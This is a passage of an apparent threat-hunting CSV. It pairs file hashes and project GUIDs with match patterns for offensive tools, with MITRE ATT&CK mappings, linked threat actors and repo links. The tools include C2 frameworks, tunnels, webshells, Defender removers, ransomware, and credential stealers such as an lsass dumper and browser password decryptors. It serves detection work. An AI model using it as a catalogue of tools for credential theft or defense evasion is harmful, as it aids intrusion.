The hook is performed via CLR Profiler API.","T1027 - T1059.001 - T1562","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/OmerYa/Invisi-Shell","1","0","#filehash","N/A","10","10","1167","166","2019-08-19T19:55:19Z","2018-10-14T23:32:56Z","30121" "*835b7b956f39cff5bb6e31a4fb06ba65615ae809e249b8161126e750b9fe1aae*",".{0,1000}835b7b956f39cff5bb6e31a4fb06ba65615ae809e249b8161126e750b9fe1aae.{0,1000}","offensive_tool_keyword","XiebroC2","Command and control server - multi-person collaborative penetration testing graphical framework","T1105 - T1573.001 - T1055.001 - T1071 - T1041 - T1059.001 - T1059.008 - T1102","TA0011 - TA0003 - TA0005 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/INotGreen/Xiebro-Plugins","1","0","#filehash","N/A","10","10","46","8","2025-02-27T09:17:31Z","2024-02-18T02:01:06Z","30122" "*8361ec775f42fc269a4ff4ae37da23bad4988de8846db0160bad66d39d9b1365*",".{0,1000}8361ec775f42fc269a4ff4ae37da23bad4988de8846db0160bad66d39d9b1365.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","30123" "*836385a2fd220d28afd32c8953ef06ae1e13ca36fadfdef901bcd8796e482f98*",".{0,1000}836385a2fd220d28afd32c8953ef06ae1e13ca36fadfdef901bcd8796e482f98.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","30124" 
"*836d7d2ecfbe96f0be128c9b1a4cdbb8e138c502c2420e91713c8b2621aa474a*",".{0,1000}836d7d2ecfbe96f0be128c9b1a4cdbb8e138c502c2420e91713c8b2621aa474a.{0,1000}","offensive_tool_keyword","canisrufus","A stealthy Python based Windows backdoor that uses Github as a command and control server","T1105 - T1071 - T1027","TA0003 - TA0011 - TA0005 - TA0010","N/A","Black Basta","C2","https://github.com/maldevel/canisrufus","1","0","#filehash","N/A","10","10","263","78","2017-08-15T15:46:20Z","2017-08-12T06:49:40Z","30126" "*837f6333561b575fc379d692f6f197a375feabb6c942170e262d36ef21709325*",".{0,1000}837f6333561b575fc379d692f6f197a375feabb6c942170e262d36ef21709325.{0,1000}","offensive_tool_keyword","ShadowSpray","A tool to spray Shadow Credentials across an entire domain in hopes of abusing long forgotten GenericWrite/GenericAll DACLs over other objects in the domain.","T1556.005 - T1098.001 - T1098","TA0006 - TA0008 - TA0004","N/A","Black Basta","Credential Access","https://github.com/Dec0ne/ShadowSpray","1","0","#filehash","N/A","10","5","459","80","2022-10-14T13:36:51Z","2022-10-10T08:34:07Z","30127" "*83803142d36f4e09346394ae2038353977bd16389fd80e09dc7fc1e8850e1365*",".{0,1000}83803142d36f4e09346394ae2038353977bd16389fd80e09dc7fc1e8850e1365.{0,1000}","offensive_tool_keyword","KeePwn","A python tool to automate KeePass discovery and secret extraction","T1555 - T1003 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Orange-Cyberdefense/KeePwn","1","0","#filehash","N/A","10","5","486","47","2024-12-12T12:47:07Z","2023-01-27T13:59:38Z","30128" "*83839ceecfba791129d3abd17623fa92d1aafac6d2e9078f5a2e842e5f599434*",".{0,1000}83839ceecfba791129d3abd17623fa92d1aafac6d2e9078f5a2e842e5f599434.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. 
Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","30129" "*838e54cb93d57048d17204c85448b8ebcd4d1403cc3d8768ac02e702a64a6b28*",".{0,1000}838e54cb93d57048d17204c85448b8ebcd4d1403cc3d8768ac02e702a64a6b28.{0,1000}","offensive_tool_keyword","sish","An open source serveo/ngrok alternative. HTTP(S)/WS(S)/TCP Tunnels to localhost using only SSH","T1572 - T1090.002","TA0010 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antoniomika/sish","1","0","#filehash","N/A","10","10","4203","325","2025-04-10T20:04:08Z","2019-02-15T15:36:23Z","30130" "*8392f4e2c944fbecade552f3bceefc426d47340a04535845ccc0f769801b28d6*",".{0,1000}8392f4e2c944fbecade552f3bceefc426d47340a04535845ccc0f769801b28d6.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","30131" "*83aa5d2000790bd20d5c57f338668fb576e76149c0683b067a62d151bc2838dd*",".{0,1000}83aa5d2000790bd20d5c57f338668fb576e76149c0683b067a62d151bc2838dd.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","30133" 
"*83aeb8fb30e7d65ffdf35d2786efc4b89957f2462a39e09a18a1194a437436c4*",".{0,1000}83aeb8fb30e7d65ffdf35d2786efc4b89957f2462a39e09a18a1194a437436c4.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","#filehash","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","30134" "*83af4437fd36d6c244dbf04d1318195103d981ca4d2f2db99e6593ed74c00ec3*",".{0,1000}83af4437fd36d6c244dbf04d1318195103d981ca4d2f2db99e6593ed74c00ec3.{0,1000}","offensive_tool_keyword","antSword","cross-platform website management toolkit - abused by attackers - supports the use of web shells","T1505.003 - T1059 - T1100 - T1027 - T1219 - T1071","TA0002 - TA0003 - TA0005 - TA0011","antSword webshell","APT41 - APT15","C2","https://github.com/AntSwordProject/antSword","1","0","#filehash","N/A","10","10","4010","616","2025-01-20T12:48:42Z","2016-03-11T09:28:00Z","30135" "*83b1ddfa24d6f81fcae9fe687185dab70e97957b471a32e69d88d9b0acfb9d7a*",".{0,1000}83b1ddfa24d6f81fcae9fe687185dab70e97957b471a32e69d88d9b0acfb9d7a.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","30136" "*83b3b581686f3920fed7238e4d5ccaaf47226447a8894189fc3cd4e5a99a5d96*",".{0,1000}83b3b581686f3920fed7238e4d5ccaaf47226447a8894189fc3cd4e5a99a5d96.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","30137" "*83b65d33d21b01395de5b5537e36f18eb8f16237a64f3a8f17991dc652d1a61a*",".{0,1000}83b65d33d21b01395de5b5537e36f18eb8f16237a64f3a8f17991dc652d1a61a.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation 
tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","30138" "*83b65d33d21b01395de5b5537e36f18eb8f16237a64f3a8f17991dc652d1a61a*",".{0,1000}83b65d33d21b01395de5b5537e36f18eb8f16237a64f3a8f17991dc652d1a61a.{0,1000}","offensive_tool_keyword","DecryptAutoLogon","Command line tool to extract/decrypt the password that was stored in the LSA by SysInternals AutoLogon","T1003.001 - T1555.003 - T1003.006","TA0006","N/A","N/A","Credential Access","https://github.com/securesean/DecryptAutoLogon","1","0","#filehash","N/A","10","3","218","32","2020-12-05T16:14:28Z","2020-12-03T20:38:59Z","30139" "*83b65d33d21b01395de5b5537e36f18eb8f16237a64f3a8f17991dc652d1a61a*",".{0,1000}83b65d33d21b01395de5b5537e36f18eb8f16237a64f3a8f17991dc652d1a61a.{0,1000}","offensive_tool_keyword","DecryptAutoLogon","Command line tool to extract/decrypt the password that was stored in the LSA by SysInternals AutoLogon","T1003.001 - T1555.003 - T1003.006","TA0006","N/A","N/A","Credential Access","https://github.com/securesean/DecryptAutoLogon","1","0","#filehash","N/A","10","3","218","32","2020-12-05T16:14:28Z","2020-12-03T20:38:59Z","30140" "*83cc5974bd89d073642b0c07af35cd89db85a1f3b3cf1e49047592076e94c913*",".{0,1000}83cc5974bd89d073642b0c07af35cd89db85a1f3b3cf1e49047592076e94c913.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","30143" "*83d99bedd82a5ddf6a8965fbc47b48eb05afb773926f5b781dcbaea39aaae048*",".{0,1000}83d99bedd82a5ddf6a8965fbc47b48eb05afb773926f5b781dcbaea39aaae048.{0,1000}","offensive_tool_keyword","PoolPartyBof","A beacon object file implementation of PoolParty Process Injection 
Technique","T1055.011 - T1055 - T1620","TA0005","N/A","Black Basta","Privilege Escalation","https://github.com/0xEr3bus/PoolPartyBof","1","0","#filehash","N/A","10","4","380","44","2023-12-21T19:00:20Z","2023-12-11T19:28:20Z","30145" "*83da7d9d86d928f9c0d2366663a04156ba92932b75b51ec53339fa67eaa87ebb*",".{0,1000}83da7d9d86d928f9c0d2366663a04156ba92932b75b51ec53339fa67eaa87ebb.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","30146" "*83dcafd146a5581427747c502219d9dd3c349ef673689c02c0ca2325256d3490*",".{0,1000}83dcafd146a5581427747c502219d9dd3c349ef673689c02c0ca2325256d3490.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","30147" "*83dd381d2122ba8b3552661dae64d149b4bcdcc9f7725b482574fd617db2ddff*",".{0,1000}83dd381d2122ba8b3552661dae64d149b4bcdcc9f7725b482574fd617db2ddff.{0,1000}","offensive_tool_keyword","antSword","cross-platform website management toolkit - abused by attackers - supports the use of web shells","T1505.003 - T1059 - T1100 - T1027 - T1219 - T1071","TA0002 - TA0003 - TA0005 - TA0011","antSword webshell","APT41 - APT15","C2","https://github.com/AntSwordProject/antSword","1","0","#filehash","N/A","10","10","4010","616","2025-01-20T12:48:42Z","2016-03-11T09:28:00Z","30148" "*83dd7c7738c5409a2f50d06f38eb82be09a232794771c87d81080220e6ab5195*",".{0,1000}83dd7c7738c5409a2f50d06f38eb82be09a232794771c87d81080220e6ab5195.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt 
passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","30149" "*83DF0D0B-8FC6-4BCA-9982-4D26523515A2*",".{0,1000}83DF0D0B\-8FC6\-4BCA\-9982\-4D26523515A2.{0,1000}","offensive_tool_keyword","DriverDump","abusing the old process explorer driver to grab a privledged handle to lsass and then dump it","T1543 - T1548 - T1562 - T1003 - T1569","TA0005 - TA0003 - TA0004 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/trustedsec/The_Shelf","1","0","#GUIDproject","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","30150" "*83e20b2fc8347cb5765a8c622ce59806a900f735088c3c9a385676f4e01849ce*",".{0,1000}83e20b2fc8347cb5765a8c622ce59806a900f735088c3c9a385676f4e01849ce.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","30151" "*83eb1e6bfd9d2a628878a82e570af36c4ed59ed06763437a1f957b8cd9799005*",".{0,1000}83eb1e6bfd9d2a628878a82e570af36c4ed59ed06763437a1f957b8cd9799005.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege 
Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","30153" "*83fec07c6e99a2087901e94461dc9cf9650c9165040c27f6cd2b98a14af320a8*",".{0,1000}83fec07c6e99a2087901e94461dc9cf9650c9165040c27f6cd2b98a14af320a8.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","30155" "*84008e4aef450b5bab0d589b59174fa9633820448d167bae94b00fe5f62d788c*",".{0,1000}84008e4aef450b5bab0d589b59174fa9633820448d167bae94b00fe5f62d788c.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","30157" "*8401c11807fda1838139211517f0aee7ed7198e237b7fd87deceb23e092f1552*",".{0,1000}8401c11807fda1838139211517f0aee7ed7198e237b7fd87deceb23e092f1552.{0,1000}","offensive_tool_keyword","Eventlogedit-evtx--Evolution","","T1070.001 - T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/3gstudent/Eventlogedit-evtx--Evolution","1","0","#filehash","N/A","9","3","267","62","2021-04-17T01:28:00Z","2018-06-05T01:21:20Z","30158" "*8405dcb456eb56be5a810d5189996286ccf9da781705ac1788644cf91487ee8b*",".{0,1000}8405dcb456eb56be5a810d5189996286ccf9da781705ac1788644cf91487ee8b.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - 
Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","30160" "*84074bcee24f8ee02ce2011e88471d900bc85cace4967b1273c634a7dba5496b*",".{0,1000}84074bcee24f8ee02ce2011e88471d900bc85cace4967b1273c634a7dba5496b.{0,1000}","offensive_tool_keyword","SharpThief","A one-click program to steal the icon, resource information, version information, modification time, and digital signature (invalid) to make the program appear legitimate","T1036 - T1070 - T1078 - T1027 - T1202","TA0005 - TA0002 - TA0001","N/A","N/A","Defense Evasion","https://github.com/INotGreen/SharpThief","1","0","#filehash","N/A","8","4","372","37","2024-12-17T05:46:39Z","2024-03-05T05:34:50Z","30161" "*84075d23f3358b16e1f68b1eb56d34d34e88da9b29d504d36b5de2522cf6c23f*",".{0,1000}84075d23f3358b16e1f68b1eb56d34d34e88da9b29d504d36b5de2522cf6c23f.{0,1000}","offensive_tool_keyword","SharpIncrease","binary padding to add junk data and change the on-disk representation of a file","T1480 - T1027","TA0005","N/A","N/A","Defense Evasion","https://github.com/mertdas/SharpIncrease","1","0","#filehash","N/A","6","2","148","30","2024-06-28T21:36:46Z","2023-03-14T23:35:32Z","30162" "*8407636b032bed867e4fe3f13d31292e55de7183947c5c2b6c8fe984231f76c8*",".{0,1000}8407636b032bed867e4fe3f13d31292e55de7183947c5c2b6c8fe984231f76c8.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","KNOTWEED","Discovery","https://github.com/Group3r/Group3r","1","0","#filehash","AD Enumeration","7","8","781","68","2025-04-08T05:03:34Z","2021-07-05T05:05:42Z","30163" "*840783103a165accdcc4f1ce1e2239edbe4491cf0599700827bd773499c9d17b*",".{0,1000}840783103a165accdcc4f1ce1e2239edbe4491cf0599700827bd773499c9d17b.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group 
Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","KNOTWEED","Discovery","https://github.com/Group3r/Group3r","1","0","#filehash","AD Enumeration","7","8","781","68","2025-04-08T05:03:34Z","2021-07-05T05:05:42Z","30164" "*840be30a16f12a6c57f8f68233b6aedb9e10e7dda76b1024b74fd660f3a13cd4*",".{0,1000}840be30a16f12a6c57f8f68233b6aedb9e10e7dda76b1024b74fd660f3a13cd4.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","30165" "*8411c83668a5bcdf0429fdc06ee58ebd41bbd537392f2979e3bcbbe2afcf860b*",".{0,1000}8411c83668a5bcdf0429fdc06ee58ebd41bbd537392f2979e3bcbbe2afcf860b.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","30166" "*841f439c8f42ffe1fa88303a9d7fd8268b6cdf9dd8b91704ba2dd8a7b8f813a3*",".{0,1000}841f439c8f42ffe1fa88303a9d7fd8268b6cdf9dd8b91704ba2dd8a7b8f813a3.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - 
T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","0","#filehash","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","30167" "*8423e2a9ddc243b82a1c52dd9b76d97bf4196c8da044bdb2fb06af6c1ecc4e95*",".{0,1000}8423e2a9ddc243b82a1c52dd9b76d97bf4196c8da044bdb2fb06af6c1ecc4e95.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","30168" "*8425D05F-F3F4-4132-9BE1-BED752685333*",".{0,1000}8425D05F\-F3F4\-4132\-9BE1\-BED752685333.{0,1000}","offensive_tool_keyword","ShareAudit","A tool for auditing network shares in an Active Directory environment","T1135 - T1005 - T1083 - T1210","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/dionach/ShareAudit","1","0","#GUIDproject","N/A","8","1","42","15","2019-04-29T10:07:57Z","2019-02-26T16:00:15Z","30169" "*84276ef1f62be4767fa91b3fe35f58b9a1d4e291415723346dd090a85d668289*",".{0,1000}84276ef1f62be4767fa91b3fe35f58b9a1d4e291415723346dd090a85d668289.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - 
T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","30170" "*843053c1c1b36afc067f792748061dd1513252038e2dbe71dddc618bf9c11394*",".{0,1000}843053c1c1b36afc067f792748061dd1513252038e2dbe71dddc618bf9c11394.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","30171" "*8432665ec509b2c4d2f2cac0ac44d543cf9991357071e3c0323e3b7e7741b038*",".{0,1000}8432665ec509b2c4d2f2cac0ac44d543cf9991357071e3c0323e3b7e7741b038.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","30173" "*8443F171-603C-499C-B6A6-F4F6910FD1D9*",".{0,1000}8443F171\-603C\-499C\-B6A6\-F4F6910FD1D9.{0,1000}","offensive_tool_keyword","AppProxyC2","simple POC to show how to tunnel traffic through Azure Application Proxy","T1090 - T1572 - T1071","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/xpn/AppProxyC2","1","0","#GUIDProject","N/A","9","10","69","18","2021-04-21T13:02:15Z","2021-04-21T10:46:16Z","30177" 
"*844405c37fe6e576573b01a4384120e7837d20ee2deb849eedd9d6a966b046f4*",".{0,1000}844405c37fe6e576573b01a4384120e7837d20ee2deb849eedd9d6a966b046f4.{0,1000}","offensive_tool_keyword","Prince-Ransomware","Go ransomware utilising ChaCha20 and ECIES encryption.","T1486 - T1489 - T1027","TA0040 - TA0009 ","N/A","N/A","Ransomware","https://github.com/SecDbg/Prince-Ransomware","1","0","#filehash","N/A","10","","N/A","","","","30178" "*844d9edc-57ad-4fcc-9fd5-77a69d4bf569*",".{0,1000}844d9edc\-57ad\-4fcc\-9fd5\-77a69d4bf569.{0,1000}","offensive_tool_keyword","Invoke-ArgFuscator","generate obfuscated command-lines for common system-native executables","T1027 - T1059 - T1202","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/wietze/Invoke-ArgFuscator","1","0","#GUIDproject","N/A","10","2","161","28","2025-04-14T21:24:29Z","2022-11-20T17:59:23Z","30179" "*845cd5a8ab75cc81e6048537fb516fb92e50b586d67927d7be9fc10a620d7025*",".{0,1000}845cd5a8ab75cc81e6048537fb516fb92e50b586d67927d7be9fc10a620d7025.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","KNOTWEED","Discovery","https://github.com/Group3r/Group3r","1","0","#filehash","AD Enumeration","7","8","781","68","2025-04-08T05:03:34Z","2021-07-05T05:05:42Z","30182" "*845cf04a125d951c0b3f70f2c669b3b1277c3b8c4c02fb91fc35e84581f409d1*",".{0,1000}845cf04a125d951c0b3f70f2c669b3b1277c3b8c4c02fb91fc35e84581f409d1.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","30183" 
"*845d0a088eac7562b0992bc11ad8d6d9b178ce4db581506632051cc2a6d8a782*",".{0,1000}845d0a088eac7562b0992bc11ad8d6d9b178ce4db581506632051cc2a6d8a782.{0,1000}","offensive_tool_keyword","truffleHog","Searches through git repositories for secrets. digging deep into commit history and branches. This is effective at finding secrets accidentally committed.","T1552 - T1596 - T1083","TA0009 - TA0005 - TA0002","N/A","Scattered Spider*","Reconnaissance","https://github.com/dxa4481/truffleHog","1","0","#filehash #linux","N/A","6","10","18812","1839","2025-04-22T17:32:40Z","2016-12-31T05:08:12Z","30184" "*845e930b1479640235d571dceb63d0b3df3f807ab09eb0f53159b043a2e20e23*",".{0,1000}845e930b1479640235d571dceb63d0b3df3f807ab09eb0f53159b043a2e20e23.{0,1000}","offensive_tool_keyword","SirepRAT","RAT tool - Remote Command Execution as SYSTEM on Windows IoT Core","T1059 - T1219 - T1105 - T1021","TA0002 - TA0011 - TA0003","N/A","N/A","C2","https://github.com/SafeBreach-Labs/SirepRAT","1","0","#filehash","N/A","7","10","380","89","2020-12-13T09:52:55Z","2019-03-02T19:51:05Z","30185" 